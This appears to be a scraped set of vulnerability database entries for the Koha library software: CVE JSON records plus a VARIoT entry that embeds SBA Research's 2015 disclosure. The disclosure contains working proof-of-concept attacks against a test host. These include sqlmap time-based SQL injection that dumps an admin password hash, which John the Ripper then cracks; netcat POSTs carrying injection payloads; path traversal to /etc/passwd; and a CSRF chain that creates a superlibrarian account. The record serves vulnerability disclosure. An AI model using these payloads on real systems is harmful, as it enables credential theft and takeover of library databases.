          "reference_data": [
            {
              "name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
              "refsource": "MISC",
              "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
            },
            {
              "name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
              "refsource": "MISC",
              "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
            },
            {
              "name": "37389",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/37389/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-16-12/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-16-12/"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
            },
            {
              "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
              "refsource": "FULLDISC",
              "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-18-8/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-18-8/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-20-1/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-20-1/"
            },
            {
              "name": "https://koha-community.org/koha-3-14-16-released/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/koha-3-14-16-released/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-4630",
    "datePublished": "2018-10-18T20:00:00",
    "dateReserved": "2015-06-16T00:00:00",
    "dateUpdated": "2024-08-06T06:18:12.057Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2014-1922 (GCVE-0-2014-1922)
Vulnerability from cvelistv5
Published
2020-01-24 16:42
Modified
2024-08-06 09:58
Severity ?
CWE
  • n/a
Summary
Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T09:58:15.663Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://koha-community.org/security-release-february-2014/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-02-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-01-24T16:42:45",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://koha-community.org/security-release-february-2014/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-1922",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660",
              "refsource": "MISC",
              "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
            },
            {
              "name": "http://koha-community.org/security-release-february-2014/",
              "refsource": "MISC",
              "url": "http://koha-community.org/security-release-february-2014/"
            },
            {
              "name": "http://www.openwall.com/lists/oss-security/2014/02/07/10",
              "refsource": "MISC",
              "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
            },
            {
              "name": "http://www.openwall.com/lists/oss-security/2014/02/10/3",
              "refsource": "MISC",
              "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-1922",
    "datePublished": "2020-01-24T16:42:45",
    "dateReserved": "2014-02-09T00:00:00",
    "dateUpdated": "2024-08-06T09:58:15.663Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2025-30076 (GCVE-0-2025-30076)
Vulnerability from cvelistv5
Published
2025-03-16 00:00
Modified
2025-03-17 15:52
CWE
  • CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Summary
Koha before 24.11.02 allows admins to execute arbitrary commands via shell metacharacters in the tools/scheduler.pl report parameter.
Impacted products
Vendor Product Version
Koha Koha Version: 0   < 22.11.24
Version: 23   < 23.11.12
Version: 24   < 24.05.07
Version: 24.06   < 24.11.02


{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-30076",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-03-17T15:52:12.983540Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-03-17T15:52:17.570Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/gl0wyy/koha-task-scheduler-rce"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unknown",
          "product": "Koha",
          "vendor": "Koha",
          "versions": [
            {
              "lessThan": "22.11.24",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            },
            {
              "lessThan": "23.11.12",
              "status": "affected",
              "version": "23",
              "versionType": "custom"
            },
            {
              "lessThan": "24.05.07",
              "status": "affected",
              "version": "24",
              "versionType": "custom"
            },
            {
              "lessThan": "24.11.02",
              "status": "affected",
              "version": "24.06",
              "versionType": "custom"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "22.11.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "23.11.12",
                  "versionStartIncluding": "23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "24.05.07",
                  "versionStartIncluding": "24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "24.11.02",
                  "versionStartIncluding": "24.06",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Koha before 24.11.02 allows admins to execute arbitrary commands via shell metacharacters in the tools/scheduler.pl report parameter."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-03-16T02:37:40.294Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://github.com/gl0wyy/koha-task-scheduler-rce"
        },
        {
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=39170"
        }
      ],
      "x_generator": {
        "engine": "enrichogram 0.0.1"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2025-30076",
    "datePublished": "2025-03-16T00:00:00.000Z",
    "dateReserved": "2025-03-16T00:00:00.000Z",
    "dateUpdated": "2025-03-17T15:52:17.570Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2025-22954 (GCVE-0-2025-22954)
Vulnerability from cvelistv5
Published
2025-03-12 00:00
Modified
2025-03-18 13:15
Severity ?
CWE
  • CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Summary
GetLateOrMissingIssues in C4/Serials.pm in Koha before 24.11.02 allows SQL Injection in /serials/lateissues-export.pl via the supplierid or serialid parameter.
Impacted products
Vendor Product Version
Koha Koha Version: 0   < 24.11.02


{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-22954",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-03-18T13:15:29.271346Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-03-18T13:15:54.560Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Koha",
          "vendor": "Koha",
          "versions": [
            {
              "lessThan": "24.11.02",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "24.11.02",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "GetLateOrMissingIssues in C4/Serials.pm in Koha before 24.11.02 allows SQL Injection in /serials/lateissues-export.pl via the supplierid or serialid parameter."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-03-13T03:22:11.330Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=38829"
        },
        {
          "url": "https://koha-community.org/koha-24-11-02-released/"
        }
      ],
      "x_generator": {
        "engine": "enrichogram 0.0.1"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2025-22954",
    "datePublished": "2025-03-12T00:00:00.000Z",
    "dateReserved": "2025-01-09T00:00:00.000Z",
    "dateUpdated": "2025-03-18T13:15:54.560Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

var-201810-0024
Vulnerability from variot

Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl. Koha Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML Injection vulnerabilities 4. Multiple cross-site scripting vulnerabilities 5. 
Multiple cross site request forgery vulnerabilities An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. =============================================================================================== SBA Research Vulnerability Disclosure  ===============================================================================================

title: Koha Unauthenticated SQL injection product:         Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website:         http://www.koha-community.org/

found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact:         cst@sba-research.org

References: http://koha-community.org/security-release-koha-3-20-1/         http://koha-community.org/security-release-koha-3-18-8/         http://koha-community.org/security-release-koha-3-16-12/

                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
                ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

===============================================================================================

========================= 1. Multiple SQL Injections =========================

  • ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
  • a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   +
  • ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +

Vulnerability:

The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well.

References:

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412

##################################################################################################

PoC:

##################################################################################################

  1. Inspect Koha database schema

Have a look at how to query the database for superlibrarian users:    http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

So basically we need to execute some SQL statement like this:    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

  1. Query the database with sqlmap

So let's fire up sqlmap with the --sql-shell parameter and input the query:

root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4          _     ___ | | ___ ___  {1.0-dev-nongit-20150513}    | -| . | |     | .'| . |    ||  |||||__,|  |          ||           ||   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:20:07

[09:20:07] [INFO] testing connection to the target URL    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:    ---    Parameter: number (GET)        Type: AND/OR time-based blind        Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)        Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)    ---    [09:20:09] [INFO] testing MySQL    [09:20:09] [INFO] confirming MySQL    [09:20:09] [INFO] the back-end DBMS is MySQL    web server operating system: Linux Debian    web application technology: Apache 2.4.10    back-end DBMS: MySQL >= 5.0.0    [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;    [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'    [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind    [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                          [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors     admin    [09:21:46] [INFO] retrieved: $2a$08$taQ    [09:23:33] [ERROR] invalid character detected. retrying..    [09:23:33] [WARNING] increasing time delay to 5 seconds     afOgEEhU    [09:25:10] [ERROR] invalid character detected. retrying..    [09:25:10] [WARNING] increasing time delay to 6 seconds     t/gW    [09:26:13] [ERROR] invalid character detected. retrying..    [09:26:13] [WARNING] increasing time delay to 7 seconds     TOmqnYe1Y6ZNxCENa    [09:29:57] [ERROR] invalid character detected. retrying..    [09:29:57] [WARNING] increasing time delay to 8 seconds     2.ONk2eZhnuEw5z9OjjxS    [09:35:08] [ERROR] invalid character detected. retrying..    [09:35:08] [WARNING] increasing time delay to 9 seconds 

select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:        'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

  1. Feed john the ripper and be lucky

root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass    root@kali:/home/wicked# john ./admin-pass     Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])    admin            (?)    guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate    Use the "--show" option to display all of the cracked passwords reliably

root@kali:/home/wicked# john ./admin-pass --show    ?:admin

1 password hash cracked, 0 left

  1. If the webserver is misconfigured, read & write access to the filesystem may be possible.

References:

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426

##################################################################################################

PoC:

##################################################################################################

==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002

==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002

====================================================================

You will notice different output in every second request, demonstrating the evaluation of the payload.

##################################################################################################

PoC End

##################################################################################################

================================= 3. Path Traversal (CVE-2015-4633) =================================

Vulnerability

The "template_path" parameter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal.

References

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408

##################################################################################################

PoC:

##################################################################################################

The following input is used to print out /etc/passwd:

/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

##################################################################################################

PoC End

##################################################################################################

================================= 4. The site also lacks challenge tokens that prevent cross-site request forgery (XSRF) attacks.

The attack can be performed by:

  • through a compromised user account.  

References

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

##################################################################################################

PoC / Attack Scenario:

##################################################################################################

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

--> http:///cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens 

--> http:///cgi-bin/koha/virtualshelves/shelves.pl

the malicious code gets executed. The code can then perform any unauthorized actions with the permissions of user bob. For example:

Create new user:

--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibrarian permission:

--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log in as superlibrarian.

Side Note: In order to make the attack work, Alice needs to be logged in to the Open Public Catalog interface at the time of clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists.

##################################################################################################

PoC / Attack Scenario End

##################################################################################################



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0024",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "library software community koha",
        "scope": null,
        "trust": 3.0,
        "vendor": "koha",
        "version": null
      },
      {
        "model": "library software community",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "koha",
        "version": "*"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 1.0,
        "vendor": "koha",
        "version": "*"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.16.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.18.8"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.20.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.16"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.16.12"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.18.0"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.20.1"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.20.x"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.16.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.16.12"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.14.16"
      },
      {
